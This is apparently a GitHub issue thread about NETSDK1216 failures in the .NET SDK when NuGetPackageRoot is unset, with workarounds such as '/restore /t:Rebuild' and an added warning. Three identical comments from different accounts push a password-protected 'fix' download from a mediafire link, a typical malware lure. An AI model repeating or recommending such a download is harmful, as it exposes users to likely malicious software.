### ISSUE TITLE
Microsoft.Net.Sdk.Compilers.Toolset download check fails because NuGetPackageRoot is unset in some scenarios

### ISSUE THREAD

**Issue by jjonescz** [dotnet/sdk#43016]
Related to https://github.com/dotnet/sdk/issues/41791 and https://github.com/dotnet/sdk/issues/42087.

The error is:

> NETSDK1216: Package Microsoft.Net.Sdk.Compilers.Toolset is not downloaded but it is needed because your MSBuild and SDK versions are mismatched. Ensure version {0} of the package is available in your NuGet source feeds and then run NuGet package restore from Visual Studio or MSBuild.

It happens because `$(NuGetPackageRoot)` is unset, hence `<RoslynTargetsPath>$(NuGetPackageRoot)\microsoft.net.sdk.compilers.toolset\$(NETCoreSdkVersion)</RoslynTargetsPath>` points to an invalid location, hence the download check fails.

For example, `$(NuGetPackageRoot)` is unset in these scenarios:
- `msbuild.exe '/t:Restore;Build'` (but it's fine when running with `/restore /t:Build`)
  - https://github.com/dotnet/msbuild/issues/9553
  - https://github.com/dotnet/msbuild/issues/2811
- in the inner build started by task `GenerateTemporaryTargetAssembly` when building WPF on .NET Framework
  - https://github.com/dotnet/sdk/issues/44605

In the following, the toolset package download was completely disabled likely because it was failing due to this bug:
- https://github.com/dotnet/winforms/pull/11878
- https://github.com/dotnet/sdk/pull/42699/commits/e9e9566478c56b2c1f223bfe2de2fb9dc04796e9

Similar issue:
- https://github.com/dotnet/msbuild/issues/10504

A workaround for this issue is being added in https://github.com/dotnet/sdk/pull/42860.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by icom85** [comment]
Hello! I am getting the same error trying to build one of our solutions on a `windows-latest` agent inside Azure DevOps and with the latest .NET 9 SDK (9.0.100-preview.7.24407.12). We use the `MSBuild@1` task to launch a classic msbuild project which does couple of other things and at the end tries to build the solution like this:
```XML
<Exec Command='$(MSBuild17ExePath) $(WinFormsNetCoreSolutionPath) /p:Configuration=$(NetCoreBuildConfiguration);Platform=&quot;$(WinFormsBuildPlatform)&quot;;WarningLevel=0;TreatWarningsAsErrors=false /t:Rebuild'/>
```
Is there a workaround, I see that one is mentioned above but could not figure out how to use it? Also, some of the related issues are now closed. Will a fix be available with a future preview version of .NET 9.

**Comment by icom85** [comment]
It seems that `/t:Restore;Rebuild` did the trick and I am able to build on the agent.

**Comment by jjonescz** [comment]
> It seems that `/t:Restore;Rebuild` did the trick and I am able to build on the agent.

Doing `/restore /t:Rebuild` should be the best solution I think.

**Comment by KirillOsenkov** [comment]
this basically breaks the build for all WPF desktop projects, let's make sure we fix this before the release if at all possible

**Comment by jjonescz** [comment]
https://github.com/dotnet/sdk/pull/43119 is a workaround for this - with that no builds should be broken except for a warning

**Comment by KirillOsenkov** [comment]
hmm a warning is still a regression for all legacy WPF, this is concerning

**Comment by jjonescz** [comment]
> all legacy WPF

only if you are in a torn SDK state (i.e., a new SDK and an old MSBuild)

**Comment by marcpopMSFT** [comment]
I believe that @jjonescz already added a warning for this specific case so closing.

**Comment by jjonescz** [comment]
Yes, there is a warning. I would consider that a workaround though. A better fix would be to make sure NuGetPackageRoot is not empty in the first place.
